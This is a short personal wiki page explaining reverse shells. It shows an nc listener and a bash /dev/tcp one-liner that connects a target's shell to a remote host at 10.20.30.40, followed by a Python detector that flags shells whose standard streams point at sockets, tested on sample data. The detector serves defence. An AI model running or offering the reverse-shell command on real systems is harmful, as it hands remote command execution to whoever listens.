wiki'd

by JoKeru

Reverse Shell

A reverse shell is achieved when you "send" a server's shell (in my demo the server is named target) to another server (hq in my setup).

Using this technique you can run root commands on a server to which you aren't connected.

# on the "hq" server, listen on a TCP port to "receive" the reverse shell
$ nc -n -l -p 60001
# on the "target" server, attach bash's stdin/stdout/stderr to the hq socket
# (10.20.30.40 is hq's address in this demo; >& sends stdout and stderr, 0<&1 attaches stdin)
$ nohup /bin/bash >& /dev/tcp/10.20.30.40/60001 0<&1 2>&1 &
# now on "hq" you can run any command
hostname # command typed into the nc session and executed on the remote host
target # output received from the command
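As an added defensive example (not part of the original post), here is a Python check for the footprint this command leaves on the target: a shell process whose file descriptors 0, 1 and 2 all resolve to a socket in /proc/<pid>/fd. The process names and fd tables in SAMPLE_PROCS are constructed for the demo; scan_proc() runs the same test against a live /proc.

```python
"""Flag shells whose standard streams are attached to a socket."""
import os
import re

# Interpreters whose stdio normally points at a tty or pipe, not a socket
SHELLS = {"bash", "sh", "dash", "zsh", "ksh"}
SOCKET_RE = re.compile(r"^socket:\[\d+\]$")


def is_reverse_shell(comm, fd_targets):
    """comm: process name; fd_targets: {fd: readlink target}.

    True when a shell has fds 0, 1 and 2 all pointing at a socket, which is
    exactly what `bash >& /dev/tcp/... 0<&1` produces. Socket-activated
    services may look similar, so review hits rather than acting blindly."""
    if comm not in SHELLS:
        return False
    std = [fd_targets.get(fd, "") for fd in (0, 1, 2)]
    return all(SOCKET_RE.match(t) for t in std)


def scan_proc(proc_root="/proc"):
    """Walk a live /proc tree; returns a list of (pid, comm) suspects."""
    hits = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        pid_dir = os.path.join(proc_root, entry)
        try:
            with open(os.path.join(pid_dir, "comm")) as f:
                comm = f.read().strip()
            fd_dir = os.path.join(pid_dir, "fd")
            targets = {}
            for fd in os.listdir(fd_dir):
                try:
                    targets[int(fd)] = os.readlink(os.path.join(fd_dir, fd))
                except OSError:
                    pass  # fd closed between listdir and readlink
        except OSError:
            continue  # process exited or no permission (run as root)
        if is_reverse_shell(comm, targets):
            hits.append((int(entry), comm))
    return hits


# Constructed sample fd tables (not captured from a real host)
SAMPLE_PROCS = {
    4242: ("bash", {0: "socket:[31337]", 1: "socket:[31337]", 2: "socket:[31337]"}),
    4243: ("bash", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),
    4244: ("sshd", {0: "/dev/null", 1: "/dev/null", 2: "/dev/null", 3: "socket:[2222]"}),
}


def scan_sample(procs=SAMPLE_PROCS):
    return [(pid, c) for pid, (c, fds) in procs.items() if is_reverse_shell(c, fds)]


if __name__ == "__main__":
    print(scan_sample())  # [(4242, 'bash')]
```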
